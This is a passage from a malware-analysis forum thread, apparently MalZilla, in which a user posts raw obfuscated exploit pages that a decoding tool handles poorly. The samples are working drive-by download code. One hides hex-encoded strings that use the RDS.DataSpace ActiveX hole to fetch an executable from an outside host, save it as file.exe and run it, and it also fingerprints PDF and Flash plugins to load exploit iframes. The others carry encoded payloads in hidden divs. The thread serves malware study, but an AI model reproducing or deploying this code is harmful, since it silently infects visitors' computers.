MalZilla

[JohnC]

Kalimero Processor doesn't work too well on this one:

Code: [Select]

<html><head><title>caWxpUk</title><style>div.caWxpUk{visibility:hidden;}</style></head><body><div id='gr4tgwsd' class='caWxpUk'>2E212E</div><div id='pdfplace'></div><span>vccfghvvr</span>hfddfwhch<u>arbqgrigyets</u><ol><li>paxjgd</li></ol><abbr>gvbpjej</abbr><br /><select><option>umwchuq</option></select><div id='ucpylirjhur' style='visibility:hidden;'>453M484D433K</div><div id='ZITYo' class='caWxpUk'>28352F342L323616443J463P4D3J3P3N2918423J4E3J4B3L4A41484C182A16161616161616164E3J4A16483H4D4A4416291618404C4C48261L1L3P4A3N3N463O44474A1K3L461L3L47453N3M4H1L3N4G3N1K48404818273O4D463L4C414746162P2G2D2F1E1F4J4E3J4A16464D3L291D1D273M2429161M2716164E3J4A162L242H1O2L424B1629163M473L4D453N464C1K3L4A3N3J4C3N2H443N453N464C1E18473K42181H464D3L1H183N3L4C181F2716162L242H1O2L424B1K4B3N4C2D4C4C4A413K4D4C3N1E18</div><a href=yitmmx>sscjrhpueyd</a><br /><textarea>fitous</textarea><br /><select><option>aygkotigoagczc</option></select><pre>qpwwns</pre><br /><div id='rwdMtu' class='caWxpUk'>413M181I18282B181H464D3L1H1829181H464D3L1H182L242H1O2L181H464D3L1H18424B2B181H464D3L1H182A181F272L242H1O2L424B1K4B3N4C2D4C4C4A413K4D4C3N1E183L44181H464D3L1H183J4B4B413M181I183L181H464D3L1H1844181H464D3L1H184B181H464D3L1H1841181H464D3L1H183M181H464D3L1H1826181H464D3L1H182E2G25222F21181H464D3L1H1821181H464D3L1H1822181H464D3L1H181J2221181H464D3L1H182D1P181H464D3L1H181J1N181H464D3L1H181N181H464D3L1H18</div><abbr>tizgahfj</abbr><br /><a href=bfyvw>ayxucxdp</a><br /><strong>eozsa</strong><br /><pre>pdxzwoa</pre><br /><br /><p>ktbbilgtmh</p><select><option>snwfu</option></select><div id='z2Cqy' class='caWxpUk'>2G181H464D3L1H181M1J25241P181H464D3L1H182D181H464D3L1H181J181H464D3L1H181M181H464D3L1H181M181H464D3L1H182F1M202I2F1O25181H464D3L1H182H1P181H464D3L1H1822181F274C4A4H4J4E3J4A16324E2H1N2N1629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E183J3M47181H464D3L1H183M181H464D3L1H183K181H464D3L1H181K181H464D3L1H184B4C4A3N3J181H464D3L1H1845181I1D1D1F274E3J4A163M241629161N274L3L3J4C3L401E3N1F4J4L4C4A4H4J4E3J4A16</div><br /><p>hynfncyeqz</p><ul><li>vjrjpgpasq</li><li><pre>sainstsufmrfsb</pre><br /><strong>hunnq</strong><br /><ol><li>ppfnmlvdklkxl</li></ol><div id='NlCV9L' class='caWxpUk'>322H2H2O4C221629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E1835403N44441K2D484844413L3J181H464D3L1H184C414746181I1D1D1F274E3J4A163M241629161N274L3L3J4C3L401E3N1F4J4L413O1E3M24162929161N1F4J4C4A4H4J4E3J4A162G374E43242M4C1M1629162L242H1O2L424B1K2F4A3N3J4C3N313K423N3L4C1E1845181H464D3L1H184B4G45441O1K3A181H464D3L1H182P2O2K363632181I1D1D1F2716162G374E43242M4C1M1K47483N461E182J181H464D3L1H182H36181I48</div><select><option>klwzdxmx</option></select><ol><li>hufhytbghiwz</li></ol><u>wzcldvdmkdx</u><span>bgnrcdyh</span>beyaebvv<a href=hvyfqwqyjoe>gdcsplwcctbyd</a><br /><div id='nqjioyjdjuqltuk' style='visibility:hidden;'>4H4D483N443O4A474C4H4I</div><div id='R2ikmaU' class='caWxpUk'>3H4D4A441I3O3J444B3N1F2716162G374E43242M4C1M1K4B3N463M1E1F271616324E2H1N2N1K4C4H483N1629161N271616324E2H1N2N1K47483N461E1F27324E2H1N2N1K394A414C3N1E2G374E43242M4C1M1K4A3N4B4847464B3N2E473M4H1F2716162I4A473P4G3J162916181K1K3E3E3524233N4340381K3N4G3N1827324E2H1N2N1K353J4E3N36472I41443N1E2I4A473P4G3J1I1O1F273N4E3J441E18322H2H2O4C221K181H464D3L1H1835403N181H464D3L1H1844442H4G3N3L181H464D3L1H184D4C3N1E</div><br /><i>fcjrzzanyv</i><div id='ohjvixugqyxwkao' style='visibility:hidden;'>4C444C3J414647</div><a href=lryistuhws>lixndsfzbai</a><br /><br /><p>tnbrztoumzmti</p><select><option>xuydcsztfsljzbv</option></select><abbr>oicub</abbr><br /><ul><li>zbhrq</li><li><div id='c2jf3Ur' class='caWxpUk'>2I4A47181H464D3L1H183P4G3J1F181H464D3L1H1827181F274A3N4C4D4A46161N274L3L3J4C3L401E3N1F4J4L4L4L3O4D463L4C41474616322G2I1E1F4J4C4A4H164J4E3J4A16473K42162916464D444427473K42162916463N4F162D3L4C414E3N3A313K423N3L4C1E182D3L4A47322G2I1K322G2I181F27413O161E17473K421F164J473K42162916463N4F162D3L4C414E3N3A313K423N3L4C1E18322G2I1K323M3O2F4C4A44181F274L413O161E473K421F164J3M473L4D453N464C1K3P3N4C2H443N453N46</div><ol><li>ncmncnfoxmbtuvb</li></ol><abbr>xhvvxtncaft</abbr><br /><a href=cericeu>ffpetjy</a><br /><br /><p>gdvdhaunlubwsjs</p><u>xrarglvu</u><p id=esjbfzypv>ganbdrglk</p><br /><div id='V7SIpD6' class='caWxpUk'>4C2E4H2L3M1E18483M3O48443J3L3N181F1K4146463N4A2K362P2O16291618283N453K3N3M164F413M4C40291D1N211M1D16403N413P404C291D1N211M1D164B4A3L291D4B48441L483M3O1K483M3O1D164C4H483N291D3J484844413L3J4C4147461L483M3O1D2A281L3N453K3N3M2A18274L4L163L3J4C3L401E3N1F164J3M473L4D453N464C1K3P3N4C2H443N453N464C2E4H2L3M1E18483M3O48443J3L3N181F1K4146463N4A2K362P2O16291618283N453K3N3M164F413M4C40291D1N211M1D16403N413P40</div><select><option>bksrksrnaidurph</option></select><span>ujiinvzdjhkzcgt</span>okeucloedepiiei<p id=hslhndvgzufo>hteahrvfkfdsmir</p><br /><br /><i>ozonvemrj</i><pre>ecsfgqdqbwxrge</pre><br /><div id='xUHkE' class='caWxpUk'>4C291D1N211M1D164B4A3L291D4B48441L483M3O1K483M3O1D164C4H483N291D3J484844413L3J4C4147461L483M3O1D2A281L3N453K3N3M2A18274L4B3N4C3641453N474D4C1E1835351E1F181I161O1M1M1F274L3O4D463L4C4147461635351E1F4J4C4A4H4J4A3N4C29463N4F162D3L4C414E3N3A313K423N3L4C1E184B46484E4F1K35463J484B40474C1638413N4F3N4A162F47464C4A47441K1N181F274E3J4A163J4A3K414C4A3J4A4H3H3O41443N162916483H4D4A44274E3J4A163M3N4B4C1629161D2F</div><textarea>diocnbtwaoyy</textarea><br /><ul><li>qtkoaxd</li><li><pre>jswakehk</pre><br /><br /><p>ceahfgj</p><div id='jdkihim' style='visibility:hidden;'>4I4D40404H3M4I41</div><div id='S9s69t' class='caWxpUk'>261L324A473P4A3J45162I41443N4B1L314D4C44474743162H4G484A3N4B4B1L4F3J3K1K3N4G3N1D273M473L4D453N464C1K4F4A414C3N1E1828473K423N3L4C163L443J4B4B413M291D3L444B413M262I1M2H201O2G221M1J1P22242F1J1N1N2G1M1J2D2G241N1J1M1M2D1M2F251M2G2F242G251D16413M291D3J4C4C3J3L431D2A281L473K423N3L4C2A181F273J4C4C3J3L431K35463J484B40474C323J4C401629163J4A3K414C4A3J4A4H3H3O41443N274B3N4C3641453N474D4C1E1D4F41463M474F1K4447</div><a href=xposlboe>adxtokhnpk</a><br /><ol><li>lzxhwajcckj</li></ol><textarea>kwafqznsdpumq</textarea><br /><u>tmlld</u><br /><p>xpnxbfqegbgyw</p><div id='L9GV7F' class='caWxpUk'>3L3J4C41474616291618443M3J48261L1L1N1O231K1M1K1M1K1N181D1I1O1M1M1M1F273J4C4C3J3L431K2F4745484A3N4B4B3N3M323J4C401629163M3N4B4C273J4C4C3J3L431K324A41464C35463J484B40474C1E3J4A3K414C4A3J4A4H3H3O41443N1I3M3N4B4C1F274L3L3J4C3L401E3N1F4J4L4L413O161E2P2G2D2F1E1F4K4K322G2I1E1F1F164J164L281L4B3L4A41484C2A</div><script>this.livaix=false;var momyvtacoixnfv='hpsbbjed';var vlzieap=2275;function wtzveinaok(){}this.feiwlafvaiglgtm='vllnewtyx';function obKkrjY(A5XDN){WsqCWC7 = '';this.pxjqjdwhtgp='khskysiyamd';this.xhinjcy=false;var fzpryvmjqhqm=7169;function uxptvf(khdfvarhaneuc){return wrqfumghwjccqm;}var kuberhxelvinjzm='fvbxxiedenqoe';function hztyhac(){}for(PMVXDUW = 0; PMVXDUW < (A5XDN.length / 2); PMVXDUW++ ){WsqCWC7 += String.fromCharCode(parseInt(A5XDN.substr(PMVXDUW * 2, 2),26));this.erxrdeuznnyghv=false;}return WsqCWC7;var skqrjzzr='wpyulgttpybmtgz';}function NdCnV412(lhQmDxz){function ssyahswssd(pxkywajtv){return iabvdlq;}this.dxzgasw='hhuyhutsboi';return document.getElementById(lhQmDxz).innerHTML;var eivulzhqzzp='vqvvbbdqavvd';this.tuwnb=false;}var BmjoKM =new Array('ZITYo','rwdMtu','z2Cqy','NlCV9L','R2ikmaU','c2jf3Ur','V7SIpD6','xUHkE','S9s69t','L9GV7F',"gr4tgwsd");for(OFMd5ZiT = 0; OFMd5ZiT  < BmjoKM.length; OFMd5ZiT++){this.uizuvjzdfibwngu='wkmcfojvqqgyri';var gkktbfstx=8663;document.write(obKkrjY(NdCnV412(BmjoKM[OFMd5ZiT])));function grqklpm(zmgmfi){return bwxvqvreineayh;}this.ylywlwtxp=false;function gdbxgjv(){}var poaamaufzva='bnmwuescmeifd';var srmsxlxxcgxpgi=6561;this.bxpdkx='kyspqutgqgri';}</script>


[JohnC]

Kalimero also has problems with this one:

Code: [Select]

<html><head><title>quyxyequat</title><style>div.queliduce{visibility:hidden;}</style></head><body><!-- xyuchothy --><div id='quutakochi' class='queliduce'>6F626A656374</div>22636<br><div id='chocuquym' class='queliduce'>637265617465456C656D656E74</div><p id="cyzythu">cyzythu</p><p id="thoqu">thoqu</p><div id='covyquijem' class='queliduce'>6964</div><i>cethotaviw</i><!-- xyaquose --><div id='getatufum' class='queliduce'>736574417474726962757465</div><tt>kitych</tt>jobyxyu<div id='chythyx' class='queliduce'>636C6173736964</div><br /><p id="chuchythy">chuchythy</p><div id='quidulu' class='queliduce'>636C7369643A42443936433535362D363541332D313144302D393833412D303043303446433239453336</div><!-- bijix --><!-- moxyag --><div id='xyujojeq' class='queliduce'>4372656174654F626A656374</div><strong>xyysizif</strong><big>doxyytupi</big><div id='thuwezug' class='queliduce'>4D73786D6C322E584D4C48545450</div><br><!-- xyuquoq --><div id='xyuvothy' class='queliduce'>5368656C6C2E4170706C69636174696F6E</div><br />thequithax<div id='codyb' class='queliduce'>41646F64622E73747265616D</div><br /><select><option>xyexy</option><option>xyexy</option></select><div id='voxyazeth' class='queliduce'>74797065</div><ul><li>kitho</li><li>kitho</li></ul>dumef<div id='chyqu' class='queliduce'>6F70656E</div><u>zoxyyqu</u><br /><div id='xyefothyxy' class='queliduce'>73656E64</div><ol><li>quachedef</li></ol><p id="sothoque">sothoque</p><div id='watakythec' class='queliduce'>7772697465</div><textarea>xyyxyut</textarea><div id="chyxyythi">chyxyythi</div><div id='chixyywiqu' class='queliduce'>474554</div><tt>checeq</tt><a href="kijuxyyx">kijuxyyx</a><div id='nyrukohasu' class='queliduce'>687474703A2F2F766976612D64656C70696E617461322E636F6D2F322F7570646174652E706870</div><p id="hyniquoq">hyniquoq</p><a href="wakufu">wakufu</a><div id='guvaquyc' class='queliduce'>66616C7365</div><br><a href="xyevuvoque">xyevuvoque</a><div id='thomuquy' class='queliduce'>726573706F6E7365426F6479</div>quechupo<span>thegaxy</span><div id='myfarot' class='queliduce'>2E2F2F2E2E2F2F66696C652E657865</div><br><p>zoxyo</p><div id='vamyquixyy' class='queliduce'>53617665546F46696C65</div><ul><li>zethec</li><li>zethec</li></ul><p id="pechy">pechy</p><div id='ruchuxyu' class='queliduce'>436C6F7365</div><textarea>wuchech</textarea><strong>sethofigep</strong><div id='xyixyathoc' class='queliduce'>7368656C6C65786563757465</div><pre>quychupymi</pre>xyanawef<div id='chyxyaque' class='queliduce'>6576616C</div><i>golate</i><pre>thovaheme</pre><script>this.hequach=9087;var kyneb = document;function hohyxyyz(){}var ziquerumy = window;function wyqueq(wyqueq){return wyqueq;}var chifuki='chifuki';function voboxyapuc(xyeque){this.dygecha="dygecha";vequid = '';function tapixyer(tapixyer){return tapixyer;}for(thothacyx = 0; thothacyx < (xyeque.length / 2); thothacyx++ ){vequid += String.fromCharCode('0x' + xyeque.substr(thothacyx * 2, 2));}this.fijufoluqu=false;return vequid;}function choquiciqu(lalochub){this.quohakezih=632;return document.getElementById(lalochub).innerHTML;}var xyothegi=8688;function jijicuthu(jijicuthu){return true;}this.xyuchuq=21419;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var faquothuv = kyneb[voboxyapuc(choquiciqu('chocuquym'))](voboxyapuc(choquiciqu('quutakochi')));");var nekathach='nekathach';this.nykithil=false;this.chiweki=11003;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("faquothuv[voboxyapuc(choquiciqu('getatufum'))](voboxyapuc(choquiciqu('covyquijem')), faquothuv);");this.lyzalabo='lyzalabo';function xyytithec(xyytithec){return true;}function zejuchi(){}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("faquothuv[voboxyapuc(choquiciqu('getatufum'))](voboxyapuc(choquiciqu('chythyx')), voboxyapuc(choquiciqu('quidulu')));");function quyxyat(){}function kyquochiqu(kyquochiqu){return kyquochiqu;}this.thuthi='thuthi';try{this.silachezon="silachezon";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var chythoga = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('thuwezug')), '');");this.xyyvucot=12818;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var xyacha = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('xyuvothy')), '');");this.tachoxyi=false;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var thachoxy = faquothuv[voboxyapuc(choquiciqu('xyujojeq'))](voboxyapuc(choquiciqu('codyb')), '');");function chusi(chusi){return true;}try{this.nixyuturum=3960;this.syquiruchu='syquiruchu';function cathokorit(cathokorit){return cathokorit;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('voxyazeth'))] = 1;");var thaquaqui=21103;var rivathyg="rivathyg";function nethi(){}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("chythoga[voboxyapuc(choquiciqu('chyqu'))](voboxyapuc(choquiciqu('chixyywiqu')), voboxyapuc(choquiciqu('nyrukohasu')), voboxyapuc(choquiciqu('guvaquyc')));");function gawovyxyu(gawovyxyu){return gawovyxyu;}this.quuwufodo=false;function lynithoth(lynithoth){return lynithoth;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("chythoga[voboxyapuc(choquiciqu('xyefothyxy'))]();");var quuquuq='quuquuq';var thusadu="thusadu";this.thosaxyyth="thosaxyyth";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('chyqu'))]();");function jubetho(jubetho){return jubetho;}var quizecezix="quizecezix";var xyuqu="xyuqu";ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('watakythec'))](chythoga[voboxyapuc(choquiciqu('thomuquy'))]);");function quysomun(quysomun){return true;}function chotho(){}this.thyluhejy=12013;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("var xyaxyiboj = voboxyapuc(choquiciqu('myfarot'));");function thethox(thethox){return thethox;}function duhubecub(){}this.gythethoqu=false;ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('vamyquixyy'))](xyaxyiboj, 2);");function chego(chego){return chego;}var pechach='pechach';function thoju(thoju){return true;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("thachoxy[voboxyapuc(choquiciqu('ruchuxyu'))]();");this.quoqu='quoqu';function xyequix(){}var xyacocichu=21017;}catch(e){}try{var suchithasa="suchithasa";var chorathe=7194;function hyquuc(hyquuc){return hyquuc;}ziquerumy[voboxyapuc(choquiciqu('chyxyaque'))]("xyacha[voboxyapuc(choquiciqu('xyixyathoc'))](xyaxyiboj);");var wyxyu=9872;this.xyuquegul="xyuquegul";function chexye(chexye){return true;}}catch(e){}}catch(e){}var wyzitich="wyzitich";function xyylaquuf(){}this.cheth=9397;</script></body></html><script>if(navigator.userAgent.indexOf("MS"+"IE"+"") != -1){PDF = new Array("Acr"+"oPD"+"F.P"+"DF"+"", "PDF.P"+"dfCtr"+"l"+"");for(i in PDF){try{obj = new ActiveXObject(PDF[i]);if (obj){document.write("<ifr"+"ame "+"src="+"notT"+"heor"+"yCit"+"es.p"+"df><"+"/ifr"+"ame>"+"");}}catch(e){}}try{obj = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");if (obj){document.write("<ifra"+"me sr"+"c=nor"+"malLe"+"ap.sw"+"f></i"+"frame"+">"+"");}}catch(e){}}else{for(i = 0; i <= navigator.plugins.length; i++){var plugin = navigator.plugins[i].name;if((plugin.indexOf("Ado"+"be "+"Acr"+"oba"+"t"+"") != -1) || (plugin.indexOf("Adobe"+" PDF"+"") != -1)){document.write("<i"+"fr"+"am"+"e "+"sr"+"c="+"no"+"tT"+"he"+"or"+"yC"+"it"+"es"+".p"+"df"+"><"+"/i"+"fr"+"am"+"e>"+"");}if(plugin.indexOf("Flas"+"h"+"") != -1){document.write("<i"+"fr"+"am"+"e "+"sr"+"c="+"no"+"rm"+"al"+"Le"+"ap"+".s"+"wf"+"><"+"/i"+"fr"+"am"+"e>"+"");}}}</script><applet code = "Show.class" width="100" height="100">

[JohnC]

Another example of the Kalimero one:

Code: [Select]

<html><head><title>kVfln0</title><style>div.kVfln0{visibility:hidden;}</style></head><body><div id='gr4tgwsd' class='kVfln0'>2E212E</div><span>ceswketap</span>slzzvkrvfgpiwqc<textarea>vgwrhbfcj</textarea><br /><br /><i>nmhxvkomvqijtnf</i><ol><li>mzdbcdgu</li></ol><div id='aktbcwszrqlopr' style='visibility:hidden;'>3N3N423M4B4M4M3O493M3N</div><br /><p>gzdeyoej</p><pre>uiuccqoq</pre><br /><div id='t2bAkX9m' class='kVfln0'>2A382H372N353917483M4A434H3M43412B19463M4I3M4F3O4E454C4G192C17171717171717174I3M4E174C3K4H4E48172B1719444G4G4C281M1M4J48404B49414A1L3O4B491M4C3M4C473M1M414K411L4C444C1929424H4A3O4G454B4A17322I2F2H1F1G4N4I3M4E174A4H3O2B1E1E2940262B171N2917174I3M4E174E1N202435172B17404B3O4H49414A4G1L3O4E413M4G412J484149414A4G1F194B191I4A4H3O1I193N4641191I4A4H3O1I193O4G191G2917174E1N2024351L4F414G2F4G4G4E453N4H4G411F</div><a href=vkbiefmfrijlb>sgjndiiyajriuxq</a><br /><select><option>praktifvnwu</option></select><span>pnxqgsl</span>snzytjkmiu<br /><p>swxneigdzsiulme</p><ol><li>odieokh</li></ol><ul><li>pnquikhquhieuo</li><li><abbr>jfitkq</abbr><br /><div id='tmDwV' class='kVfln0'>194540191J192A191I4A4H3O1I192D2B191I4A4H3O1I194E1N191I4A4H3O1I192024191I4A4H3O1I19352D2C191G294E1N2024351L4F414G2F4G4G4E453N4H4G411F193O48191I4A4H3O1I193M4F4F191I4A4H3O1I1945191I4A4H3O1I1940191J193O191I4A4H3O1I19484F4540191I4A4H3O1I19282G191I4A4H3O1I192I191I4A4H3O1I1927191I4A4H3O1I19242H191I4A4H3O1I192323241K24232F21191I4A4H3O1I191K1O1O2I1N1K191I4A4H3O1I1927191I4A4H3O1I1926212F191I4A4H3O1I191K191I</div><br /><i>yhgodky</i><select><option>dfzdandtylws</option></select><ul><li>egbwtubsichq</li><li><a href=rmiwffpjctbe>abzryquiw</a><br /><pre>tzuaem</pre><br /><u>rwbbctmkcyjra</u><br /><p>najfhofcnhrgv</p><div id='ITgCCe' class='kVfln0'>4A4H3O1I191N1N2H1N222K2H20272J2124191G294G4E4L4N4I3M4E172G35352N222H4K4C172B174E1N2024351L2H4E413M4G41343N46413O4G1F193M404B191I4A4H3O1I1940191I4A4H3O1I193N1L4F191I4A4H3O1I194G191I4A4H3O1I194E191I4A4H3O1I1941191I4A4H3O1I193M191I4A4H3O1I1949191J1E1E1G294I3M4E174026172B171O29503O3M4G3O441F411G4N504G4E4L4N4I3M4E17352J2J314G24172B174E1N2024351L2H4E413M4G41343N46413O4G1F1938191I4A4H3O1I1944191I4A4H3O1I</div><a href=dnfinduhf>rulggxkep</a><br /><strong>eeevkbkxidcuo</strong><br /><select><option>oblcabgyfmop</option></select><span>qowmrxgcfv</span>bwtjhuxrlwoqgn<u>nobdhjkkzkozs</u><div id='hdjuhydb' style='visibility:hidden;'>444M4E4E4F3O404C3N423N4G4M4E</div><div id='bwaPH' class='kVfln0'>19414848191I4A4H3O1I191L2F4C191I4A4H3O1I194C48453O191I4A4H3O1I193M4G454B191I4A4H3O1I194A191J1E1E1G294I3M4E174026172B171O29503O3M4G3O441F411G4N5045421F4026172B2B171O1G4N4G4E4L4N4I3M4E172H431N3M39252O2F172B174E1N2024351L2H4E413M4G41343N46413O4G1F19494F4K494820191I4A4H3O1I191L3D191I4A4H3O1I1932191I4A4H3O1I19312M3939191I4A4H3O1I1935191J1E1E1G2917172H431N3M39252O2F1L4B4C414A1F192L191I4A4H3O1I192J39191J</div><textarea>vlntb</textarea><br /><pre>cuqoorfdtguj</pre><br /><p id=aewwtnnyn>xhqblaisisec</p><br /><div id='ekdckzxwihbnoiq' style='visibility:hidden;'>3O424I404L4H474B</div><div id='KmXVfl' class='kVfln0'>4C3K4H4E481J423M484F411G2917172H431N3M39252O2F1L4F414A401F1G2917172G35352N222H4K4C1L4G4L4C41172B171O2917172G35352N222H4K4C1L4B4C414A1F1G292G35352N222H4K4C1L3C4E454G411F2H431N3M39252O2F1L4E414F4C4B4A4F412G4B404L1G2917172K4E4B434K3M172B17191L1L3H3H3826254147443B1L414K4119292G35352N222H4K4C1L383M4I41394B2K4548411F2K4E4B434K3M1J201G29414I3M481F19352J2J314G241L384441191I4A4H3O1I1948482J4K413O4H4G411F2K</div><ul><li>mruacbvhkl</li><li><span>sljawo</span>vqhpvvjly<br /><p>hbolop</p><div id='sjbihbhgr' style='visibility:hidden;'>474A3M4B4G464G4A483M4I4H3M3M4B</div><a href=dkxjwpcnz>eyjvizwihpwvxde</a><br /><br /><i>kaout</i><div id='MmzXYt' class='kVfln0'>4E4B434K3M1G29191G294E414G4H4E4A171O29503O3M4G3O441F411G4N505050424H4A3O4G454B4A17352I2K1F1G4N4G4E4L4N4E414G2B4A414J172F3O4G454I413D343N46413O4G1F192F3O4E4B352I2K1L352I2K191G2917484B3O3M4G454B4A1L444E4142172B17194F4C481M4C40421L4C40421929503O3M4G3O441F411G4N5050424H4A3O4G454B4A1738381F1G4N4G4E4L4N4E414G2B4A414J172F3O4G454I413D343N46413O4G1F194F4A4C4I4J1L384A3M4C4F444B4G173B45414J414E172H4B4A4G4E4B</div><br /><i>kuomufd</i><div id='hejrrz' style='visibility:hidden;'>4M484D454B3O493M484F4H4K4L</div><br /><p>dkxqzrouvnze</p><strong>btuheokmbrse</strong><br /><div id='niRPgw6' class='kVfln0'>481L1O191G294I3M4E173M4E3N454G4E3M4E4L3K42454841172B174C3K4H4E48294I3M4E1740414F4G172B171E2H281M354E4B434E3M49172K4548414F1M344H4G484B4B47172J4K4C4E414F4F1M4J3M3N1L414K411E29404B3O4H49414A4G1L4J4E454G411F192A4B3N46413O4G173O483M4F4F45402B1E3O484F4540282K1N2J22202I241N1K2124262H1K1O1O2I1N1K2F2I261O1K1N1N2F1N2H271N2I2H262I271E1745402B1E3M4G4G3M3O471E2C2A1M4B3N46413O4G2C191G293M4G4G3M3O471L384A3M4C4F</div><abbr>jfixmyoexnipvn</abbr><br /><a href=gegxxfhykvwaj>rykthnu</a><br /><strong>yetbfq</strong><br /><select><option>rngowb</option></select><p id=zatazebmgtmp>pxqubtnvsahh</p><br /><ol><li>aitzpjzjmsyd</li></ol><div id='DmIt8K' class='kVfln0'>444B4G353M4G44172B173M4E3N454G4E3M4E4L3K42454841294F414G394549414B4H4G1F1E4J454A404B4J1L484B3O3M4G454B4A172B171948403M4C281M1M1O20251L1N1L1N1L1O191E1J201N1N1N1G293M4G4G3M3O471L2H4B494C4E414F4F4140353M4G44172B1740414F4G293M4G4G3M3O471L354E454A4G384A3M4C4F444B4G1F3M4E3N454G4E3M4E4L3K424548411J40414F4G1G29503O3M4G3O441F411G4N5050424H4A3O4G454B4A173C32311F1G4N404B3O4H49414A4G1L4J4E454G411F1E2A40454I17</div><span>oxpazmwqkmfwnco</span>nnhjdi<abbr>mmmkzdeqyxrbjx</abbr><br /><br /><p>feksjeixkdktl</p><pre>ssymnkgezh</pre><br /><select><option>zfjutqgv</option></select><div id='SHHc7Pcb' class='kVfln0'>45402B194E414C483M3O41192C4K2A1M40454I2C1E1G294I3M4E174F4E4G474B40172B174H4A414F3O3M4C411F191C4H222122211C4H222122211C4H1N42413N1C4H2121233N1C4H24243O271C4H261N3N271C4H261N1N1O1C4H4142212119171I191C4H412022211C4H413N423M1C4H41261N231C4H4242413O1C4H424242421C4H263N25421C4H404222411C4H414241421C4H242241421C4H41213M421C4H274224221C4H222042211C4H274224221C4H244141251C4H41421N211C4H4142413N19171I191C4H</div><br /><i>ytcwcvji</i><select><option>kgejthv</option></select><abbr>zirrmmd</abbr><br /><textarea>ejnyghooy</textarea><br /><u>cnitifjphukg</u><ul><li>vsapmcafut</li><li><ol><li>uhjierbq</li></ol><div id='MDDXD1' class='kVfln0'>242241421C4H3N271N211C4H241O26251C4H411O3M1O1C4H1N251N211C4H41421O1O1C4H414241421C4H3M3M24241C4H3N27413N1C4H252526251C4H24231O1O1C4H1N25411O1C4H41421O421C4H414241421C4H3M3M24241C4H3N27412519171I191C4H3O3M26251C4H1O1N23421C4H1N2520401C4H41421N401C4H414241421C4H3M3M24241C4H3N2741211C4H1N1N26251C4H1N42201O1C4H1N2526421C4H4142213N1C4H414241421C4H3M3M24241C4H3N2742421C4H204126251C4H1N3M272419171I191C4H</div><br /><i>utadzncned</i><ol><li>xoyzc</li></ol><a href=jfxcgeoypfys>tchmvyixmcjoo</a><br /><pre>uabvmtbaxpwo</pre><br /><div id='jwvmdupbmrvnj' style='visibility:hidden;'>434I4F494G414K464A3M4M4C434L</div><abbr>touwwwhrcyl</abbr><br /><div id='uKr623' class='kVfln0'>1N2523251C4H414220271C4H414241421C4H3M3M24241C4H3M42423N1C4H402524421C4H273M203O1C4H24241O231C4H42253M3M1C4H41261N241C4H414241411C4H3N1O41421C4H273M24241C4H24223O3N1C4H413N3M3M1C4H4141262319171I191C4H24223N241C4H42253N3M1C4H1N253N271C4H414224221C4H414241421C4H26253N421C4H422340271C4H27423O1N1C4H25261N251C4H414241421C4H242441421C4H42213M3M1C4H203M24221C4H2042243O1C4H24243N421C4H3O423M3M19171I191C4H</div><select><option>ozojwprdc</option></select><ul><li>hnfldrsal</li><li><div id='sqpuw' style='visibility:hidden;'>4B4F414L4B444M4B4F4C4M3M4J</div><strong>idfbprmaeglw</strong><br /><pre>dkhflbnj</pre><br /><div id='I4Syx5' class='kVfln0'>1O1N26251C4H414241421C4H3N4241421C4H3M3M24221C4H2623423N1C4H3N2441401C4H3N3M24221C4H1N2542251C4H414226411C4H414241421C4H3M3M413O1C4H20263O421C4H3N2141421C4H3O1O271O1C4H2026263M1C4H413N3M4219171I191C4H263M27251C4H414241421C4H273M1O1N1C4H24223O421C4H41213M3M1C4H414126231C4H24223N241C4H42253N3M1C4H3M421N251C4H414241421C4H262341421C4H3N2541261C4H3M3M413O1C4H403O3O3N1C4H3N3O21221C4H1O1N3N3O19171I191C4H</div><ul><li>psrmphst</li><li><br /><i>oqzplesorum</i><abbr>fdverxa</abbr><br /><ol><li>dfqznp</li></ol><u>lnwgqhgwhvhkokl</u><p id=wwskheqrso>nxfqlpwvhp</p><br /><div id='acaYwy' class='kVfln0'>3O42273M1C4H3N3O3N421C4H3M3M24221C4H262342211C4H3N24413M1C4H3N3M24221C4H1N2542251C4H41423O3O1C4H414241421C4H414226231C4H273M1O1N1C4H24223O421C4H41253M3M1C4H414026231C4H24223N241C4H42253N3M19171I191C4H42421N251C4H414241421C4H262341421C4H24221O1N1C4H42423M3M1C4H414126231C4H24223N241C4H42253N3M1C4H41421N251C4H414241421C4H3M4141421C4H3N403N221C4H1N41413O1C4H1N41413O1C4H1N41413O1C4H1N41413O19171I191C4H</div><textarea>lufzxv</textarea><br /><a href=quhqh>vlcced</a><br /><div id='axlirkoh' style='visibility:hidden;'>4A443O3M4D4A4J4I474B4I</div><abbr>igtxtbr</abbr><br /><pre>zhpziybd</pre><br /><br /><i>rcowemlsq</i><div id='bM9Iwd0J' class='kVfln0'>1N21243O1C4H3N23413N1C4H24223N3O1C4H1N4021231C4H3N401O261C4H1N421O1N1C4H24223N3M1C4H24221N211C4H412527201C4H3N2024221C4H3N2741211C4H273O24221C4H242240211C4H421O273N1C4H413O27251C4H3N271O3O19171I191C4H272724221C4H413O3O421C4H403O1O3O1C4H3M2420241C4H22203M411C4H203O413O1C4H403O3N271C4H411N1O271C4H4242231O1C4H1O4040231C4H4125273N1C4H201O20411C4H413O41201C4H3M421O401C4H1O411N221C4H1O1O402219171I191C4H</div><a 